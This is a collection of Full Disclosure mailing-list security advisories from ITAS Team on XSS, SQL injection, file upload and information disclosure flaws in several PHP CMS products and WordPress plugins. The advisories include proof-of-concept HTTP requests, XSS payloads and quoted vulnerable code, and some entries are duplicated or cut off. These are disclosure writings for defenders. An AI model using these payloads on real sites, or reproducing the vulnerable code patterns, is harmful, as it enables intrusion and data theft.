[FD] Cross-Site Scripting | Zeuscart V4
#Vulnerability: Cross-Site Scripting #Vendor: http://www.zeuscart.com #Download link: http://zeuscart.com/download/ #Affected version: Zeuscart V4 #CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N #Condition: The attack is performed by an "Anonymous User" #Payload: "-->alert(/ITASVN/) #Fix version: N/A #Author: Dang Quoc Thai thai.q.d...@itas.vn và ITAS Team ::PROOF OF CONCEPT:: + REQUEST GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1 Host: demo.target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.target.com/demo/ Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074 Connection: keep-alive +RESPONSE HTTP/1.1 200 OK Date: Mon, 02 Nov 2015 02:21:55 GMT Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 X-Powered-By: PHP/5.3.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 25032 ... http://demo.target.com/index.php?do=index";>http://demo.target.com/images/logo/20151012210547_sell_logo.png"; alt="ZeusCart"> alert(/ITASVN/)" onclick="searchitem();"> Search http://demo.target.com/index.php?do=showcart";>Shopping Cart - 0 Items http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerabili ty-in-zeuscart-cms/ - https://www.youtube.com/watch?v=CPgzAra_mXw ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Wordpress plugin Simple Ads Manager - Information Disclosure
#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en Best regard ---- ITAS Team (www.itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2825 #Author: Tran Dinh Tien (tien.d.t...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: targer.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---10898951822009521617421026 Content-Length: 683 -10898951822009521617421026 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/x-php -10898951822009521617421026 Content-Disposition: form-data; name="action" upload_ad_image -10898951822009521617421026- + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 303 to 314 case 'sam_ajax_upload_ad_image': if(isset($_POST['path'])) { $uploadDir = $_POST['path']; $file = $uploadDir . basename($_FILES['uploadfile']['name']); if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) { $out = array('status' => "success"); } else { $out = array('status' => "error"); } } break; + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en - https://www.youtube.com/watch?v=8IU9EtUTkxI Best regard ITAS Team (www.itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple SQL Injection
#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ Content-Length: 270 Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3 - Vulnerable file: simple-ads-manager/sam-ajax.php - Vulnerable code: case 'sam_ajax_sam_hits': if(isset($_POST['hits']) && is_array($_POST['hits'])) { $hits = $_POST['hits']; $values = ''; $remoteAddr = $_SERVER['REMOTE_ADDR']; foreach($hits as $hit) { $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; } $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; $result = $wpdb->query($sql); if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); else echo json_encode(array( 'success' => false, 'result' => $result, 'sql' => $sql, 'hits' => $hits, 'values' => $values )); } break; ---SQL INJECTION 2--- +REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=load_posts&cstr=&sp=Post&spg=Page + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: case 'sam_ajax_load_posts': $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; //set @row_num = 0; //SELECT @row_num := @row_num + 1 AS recid $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;"; $posts = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($posts as &$val) { switch($val['type']) { case 'post': $val['type'] = $sPost; break; case 'page': $val['type'] = $sPage; break; default: $val['type'] = $sPost . ': '.$val['type']; break; } $k++; $val['recid'] = $k; } $out = array( 'status' => 'success', 'total' => count($posts), 'records' => $posts ); break; ---SQL INJECTION 3--- +REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.
[FD] Wordpress plugin Simple Ads Manager - SQL Injection
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ Content-Length: 270 Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3 - Vulnerable file: simple-ads-manager/sam-ajax.php - Vulnerable code: case 'sam_ajax_sam_hits': if(isset($_POST['hits']) && is_array($_POST['hits'])) { $hits = $_POST['hits']; $values = ''; $remoteAddr = $_SERVER['REMOTE_ADDR']; foreach($hits as $hit) { $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; } $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; $result = $wpdb->query($sql); if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); else echo json_encode(array( 'success' => false, 'result' => $result, 'sql' => $sql, 'hits' => $hits, 'values' => $values )); } break; ---SQL INJECTION 2--- +REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=load_posts&cstr=&sp=Post&spg=Page + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: case 'sam_ajax_load_posts': $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; //set @row_num = 0; //SELECT @row_num := @row_num + 1 AS recid $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;"; $posts = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($posts as &$val) { switch($val['type']) { case 'post': $val['type'] = $sPost; break; case 'page': $val['type'] = $sPage; break; default: $val['type'] = $sPost . ': '.$val['type']; break; } $k++; $val['recid'] = $k; } $out = array( 'status' => 'success', 'total' => count($posts), 'records' => $posts ); break; ---SQL INJECTION 3--- +REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.89187
[FD] Community Gallery - Srored Corss-Site Scripting vulnerability
#Vulnerability title: Community Gallery - Srored Corss-Site Scripting vulnerability #Product: Community Gallery #Vendor: https://www.woltlab.com #Affected version: Community Gallery 2.0 before 12/10/2014 #Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery #Fixed version: Community Gallery 2.0 after 12/26/2014 #CVE ID: CVE-2015-2275 #Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512 d9eed HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/ Content-Length: 1300 Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620 Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje ctIDs%5B%5D=7¶meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1¶meters%5Bdata%5 D%5B7%5D%5BcategoryIDs%5D%5B%5D=3¶meters%5Bdata%5D%5B7%5D%5Bdescription% 5D=test¶meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1¶meters%5Bdata% 5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg¶meters%5Bdata%5D%5B7%5D%5Bfilesize%5 D=47948¶meters%5Bdata%5D%5B7%5D%5Bheight%5D=480¶meters%5Bdata%5D%5B7 %5D%5BimageID%5D=7¶meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0¶meters%5B data%5D%5B7%5D%5Blongitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Borientation%5D =1¶meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing¶meters%5Bdata%5D% 5B7%5D%5BthumbnailHeight%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5 D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0¶meters%5Bdata%5D%5B7%5 D%5BthumbnailY%5D=0¶meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg& parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript% 3E¶meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788 bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg¶meters%5Bdata%5D%5B7%5 D%5Bwidth%5D=640¶meters%5Bdata%5D%5B7%5D%5Blocation%5D=¶meters%5BisE dit%5D=1 - Vulnerable parameter: parameters[data][7][title] ::DISCLOSURE:: + 12/10/2014: Detect vulnerability + 12/10/2014: Send the detail vulnerability to vendor + 03/11/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu rning-board-community-gallery-77.html ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. ---- ITAS Team (itas.t...@itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ProjectSend r561 - SQL injection vulnerability
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability #Product: ProjectSend r561 #Vendor: http://www.projectsend.org/ #Affected version: ProjectSend r561 #Download link: http://www.projectsend.org/download/67/ #Fixed version: N/A #Author: Le Ngoc Phi (phi.n...@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: GET /projectsend/users-edit.php?id= HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456; PHPSESSID=jec50hu4plibu5p2p6hnvpcut6 Connection: keep-alive - Vulnerable file: client-edit.php - Vulnerable parameter: id - Vulnerable code: if (isset($_GET['id'])) { $client_id = mysql_real_escape_string($_GET['id']); /** * Check if the id corresponds to a real client. * Return 1 if true, 2 if false. **/ $page_status = (client_exists_id($client_id)) ? 1 : 2; } else { /** * Return 0 if the id is not set. */ $page_status = 0; } /** * Get the clients information from the database to use on the form. */ if ($page_status === 1) { $editing = $database->query("SELECT * FROM tbl_users WHERE id=$client_id"); while($data = mysql_fetch_array($editing)) { $add_client_data_name = $data['name']; $add_client_data_user = $data['user']; $add_client_data_email = $data['email']; $add_client_data_addr = $data['address']; $add_client_data_phone = $data['phone']; $add_client_data_intcont = $data['contact']; if ($data['notify'] == 1) { $add_client_data_notity = 1; } else { $add_client_data_notity = 0; } if ($data['active'] == 1) { $add_client_data_active = 1; } else { $add_client_data_active = 0; } } } ::DISCLOSURE:: + 01/06/2015: Detect vulnerability + 01/07/2015: Contact to vendor + 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply + 03/05/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in -projectsend-r561-76.html ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. Best Regards, - ITAS Team (www.itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Radexscript CMS 2.2.0 - SQL Injection vulnerability
#Vulnerability title: Radexscript CMS 2.2.0 - SQL Injection vulnerability #Vendor: http://redaxscript.com/ #Product: Radexscript CMS #Software link: http://redaxscript.com/download/releases #Affected version: Redaxscript 2.2.0 #Fixed version: Redaxscript 2.3.0 #CVE ID: CVE-2015-1518 #Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) :: PROOF OF CONCEPT :: POST /redaxscript/ HTTP/1.1 Host: target.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 96 search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_pos t=Search - Vulnerable parameter: $search_terms - Vulnerable file: redaxscript/includes/search.php - Vulnerable function: search_post() - Vulnerable code: function search_post() { /* clean post */ if (ATTACK_BLOCKED < 10) { $search_terms = clean($_POST['search_terms'], 5); } /* validate post */ if (strlen($search_terms) < 3 || $search_terms == l('search_terms')) { $error = l('input_incorrect'); } /* query results */ else { $search = array_filter(explode(' ', $search_terms)); $search_keys = array_keys($search); $last = end($search_keys); /* query search */ $query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1'; if ($search) { $query .= ' && ('; foreach ($search as $key => $value) { $query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\''; if ($last != $key) { $query .= ' || '; } } $query .= ')'; } $query .= ' ORDER BY date DESC LIMIT 50'; $result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray(); $num_rows = count($result); if ($result == '' || $num_rows == '') { $error = l('search_no'); } /* collect output */ else if ($result) { $accessValidator = new Redaxscript\Validator\Access(); $output = '' . l('search') . ''; $output .= form_element('fieldset', '', 'set_search_result', '', '', '' . l('articles') . '') . ''; foreach ($result as $r) { $access = $r['access']; /* if access granted */ if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED) { if ($r) { foreach ($r as $key => $value) { $$key = stripslashes($value); } } /* prepare metadata */ if ($description == '') { $description = $title; } $date = date(s('date'), strtotime($date)); /* build route */ if ($category == 0)
[FD] Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities
# Exploit Title:Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities # Vendor: http://www.sefrengo.org/ # Download link:http://forum.sefrengo.org/index.php?showtopic=3368 ( https://github.com/sefrengo-cms/sefrengo-1.x/tree/22c0d16bfd715631ed317cc990785ccede478f07 ) # CVE ID: CVE-2015-1428 # Vulnerability:SQL Injection # Affected version: Sefrengo CMS v1.6.1 # Fixed version:Sefrengo CMS v1.6.2 # Author:Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team ( www.itas.vn) ::PROOF OF CONCEPT:: Link 1: - Vulnerable file: /backend/external/phplib/ct_sql.inc - Vulnerable function: function ac_get_value($id, $name) - Vulnerable parameter: $id - Vulnerable code: function ac_get_value($id, $name) { global $cms_db; $this->db->query(sprintf("select val from %s where sid = '%s' and name = '%s'", $cms_db['sessions'], $id, addslashes($name))); if ($this->db->next_record()) { $str = $this->db->f("val"); $str2 = base64_decode( $str ); if ( ereg("^".$name.":.*", $str2) ) { $str = ereg_replace("^".$name.":", "", $str2 ); } else { $str3 = stripslashes( $str ); if ( ereg("^".$name.":.*", $str3) ) { $str = ereg_replace("^".$name.":", "", $str3 ); } else { switch ( $this->encoding_mode ) { case "slashes": $str = stripslashes($str); break; case "base64": default: $str = base64_decode($str); } } }; return $str; }; return ""; } Link 2: - Vulnerable file: /backend/inc/class.values_ct.php - Vulnerable function: function set_value($mixed) - Vulnerable parameter: $mixed['id'] - Vulnerable code: function set_value($mixed) { global $cms_db, $db; //build query $sql_group = (empty($mixed['group'])) ? 0: ''.$mixed['group']; $sql_client = (empty($mixed['client'])) ? '': 'AND idclient IN ('. $mixed['client'] .')'; $sql_lang = (empty($mixed['lang'])) ? '': 'AND idlang IN ('. $mixed['lang'] .')'; $sql_key = (empty($mixed['key'])) ? '': 'AND V.key1 = "'. $mixed['key'] . '" '; $sql_key2 = (empty($mixed['key2'])) ? '': 'AND V.key2 = "'. $mixed['key2'] . '" '; $sql_key3 = (empty($mixed['key3'])) ? '': 'AND V.key3 = "'. $mixed['key3'] . '" '; $sql_key4 = (empty($mixed['key4'])) ? '': 'AND V.key4 = "'. $mixed['key4'] . '" '; $sql_id = (empty($mixed['id'])) ? "": "AND V.idvalues = '". $mixed['id'] . "' "; $sql = "SELECT * FROM". $cms_db['values'] ." AS V WHEREV.group_name IN ('$sql_group') $sql_client $sql_lang $sql_key $sql_key2 $sql_key3 $sql_key4 $sql_id"; //die($sql); $db -> query($sql); $count_rows = $db ->num_rows(); if($count_rows > 1){ echo $sql .' Fehler in Klasse "cms_value_ct". Es wurde mehr als ein Ergebnis gefunden. Anfrage ist nicht eindeutig'; exit; } elseif($count_rows == 1){ $db -> next_record(); $mixed['id'] = $db -> f('idvalues'); //echo "update"; $this -> _update_by_id($mixed); } else{ $this -> insert($mixed); } } ::DISCLOSURE:: + 01/08/2015: Send the detail of vulnerabilities to vendor and Vendor confirmed + 01/25/2015: Vendor releases patch + 01/26/2015: ITAS Team publishes information ::REFERENCE:: - Detail and videos: http://www.itas.vn/news/itas-team-found-out-multiple-sql-injection-vulnerabilities-in-sefrengo-cms-v1-6-1-74.html - https://github.com/sefrengo-cms/sefrengo-1.x/commit/22c0d16bfd715631ed317cc990785ccede478f07 ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP. ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. = ITAS Team (www.itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection Vulnerability in Microweber 0.95
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95 # Vendor: https://microweber.com/ # Download link: https://microweber.com/download (https://github.com/microweber/microweber) # CVE ID: CVE-2014-9464 # Vulnerability: SQL Injection # Affected version: Version 0.95 before 12/09/2014. # Fixed version:Version 0.95 updated on 12/11/2014 # Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) ::VULNERABILITY DETAIL:: - A SQL injection vulnerability has been found and confirmed within the Microweber CMS as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes, or other private information that are stored in the database. The following URL and parameter have been confirmed to suffer from SQL injection. - Attack vector: GET /shop/category:[SQL INJECTION HERE] HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target/shop Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275 Connection: keep-alive - Vulnerable file: microweber-master/src/Microweber/Category.php - Vulnerable function: get_children($parent_id = 0, $type = false, $visible_on_frontend = false) - Vulnerable parameter: $parent_id - Vulnerable code: public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false) { $categories_id = intval($parent_id); $cache_group = 'categories/' . $categories_id; $table = $this->tables['categories']; $db_t_content = $this->tables['content']; if (isset($orderby) == false) { $orderby = array(); //$orderby[0] = 'updated_on'; //$orderby[1] = 'DESC'; $orderby[0] = 'position'; $orderby[1] = 'asc'; } if (intval($parent_id) == 0) { return false; } $data = array(); $data['parent_id'] = $parent_id; if ($type != FALSE) { $data['data_type'] = $type; } else { $type = 'category_item'; $data['data_type'] = $type; } $cache_group = 'categories/' . $parent_id; $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id "; $q_cache_id = __FUNCTION__ . crc32($q); $save = $this->app->db->query($q, $q_cache_id, $cache_group); if (empty($save)) { return false; } $to_return = array(); if (is_array($save) and !empty($save)) { foreach ($save as $item) { $to_return[] = $item['id']; } } $to_return = array_unique($to_return); return $to_return; } - Fix code: public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false) { $categories_id = $parent_id =intval($parent_id); $cache_group = 'categories/' . $categories_id; $table = $this->tables['categories']; $db_t_content = $this->tables['content']; if (isset($orderby) == false) { $orderby = array(); //$orderby[0] = 'updated_on'; //$orderby[1] = 'DESC'; $orderby[0] = 'position'; $orderby[1] = 'asc'; } if (intval($parent_id) == 0) { return false; } $data = array(); $data['parent_id'] = $parent_id; if ($type != FALSE) { $data['data_type'] = $type; } else { $type = 'category_item'; $data['data_type'] = $type; } $cache_group = 'categories/' . $parent_id; $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id "; $q_cache_id = __FUNCTION__ . crc32($q); $save = $this->app->db->query($q, $q_cache_id, $cache_group); if (empty($save)) { return false; } $to_return = array(); if (is_array($save) and !empty($save)) { fore
[FD] XSS Vulnerability in Fork CMS 3.8.3
